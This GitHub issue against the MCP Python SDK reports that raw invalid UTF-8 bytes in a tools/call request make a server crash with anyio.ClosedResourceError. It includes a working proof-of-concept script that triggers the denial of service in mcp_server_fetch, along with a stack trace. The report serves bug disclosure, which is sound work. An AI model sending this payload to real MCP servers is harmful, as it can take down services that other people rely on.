
[Bug] Server crashes with anyio.ClosedResourceError when receiving raw invalid UTF-8 bytes #2328

@manthanghasadiya

Description

Summary

MCP Python SDK servers crash with anyio.ClosedResourceError when a client sends raw invalid UTF-8 bytes in request parameters. A malicious client can crash any MCP server using a single request.

Environment

  • MCP SDK Version: 1.26.0 (latest)
  • Python: 3.13
  • OS: Windows 11

Proof of Concept

Save as crash_poc.py:

import sys
import time

# Initialize
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {"protocolVersion": "2024-11-05", "capabilities": {}, "clientInfo": {"name": "test", "version": "1.0"}}}\n')
sys.stdout.flush()
time.sleep(1)

# Initialized notification
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "method": "notifications/initialized"}\n')
sys.stdout.flush()
time.sleep(0.5)

# Crash payload - raw bytes 0xFF 0xFE
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "id": 3, "method": "tools/call", "params": {"name": "fetch", "arguments": {"url": "http://x\xff\xfe"}}}\n')
sys.stdout.flush()
time.sleep(3)

Run:

python crash_poc.py | python -m mcp_server_fetch

Stack Trace

File "...\mcp\server\lowlevel\server.py", line 781, in _handle_request
    await message.respond(response)
File "...\mcp\shared\session.py", line 349, in _send_response
    await self._write_stream.send(session_message)
File "...\anyio\streams\memory.py", line 218, in send_nowait
    raise ClosedResourceError
anyio.ClosedResourceError

Key Observation

  • String "http://x[0xff][0xfe]" → handled gracefully with validation error ✅
  • Raw bytes b"http://x\xff\xfe" → server crash ❌

Expected Behavior

The server should return a JSON-RPC error response for malformed input, not crash.

Impact

Denial of Service - Any MCP client can crash any MCP server using the Python SDK with a single malformed request.

Discovery

Found using mcpsec evolutionary fuzzer.

Example Code

Python & MCP Python SDK

python --version
Python 3.13.1

pip show mcp | Select-String "Version."
Version: 1.26.0
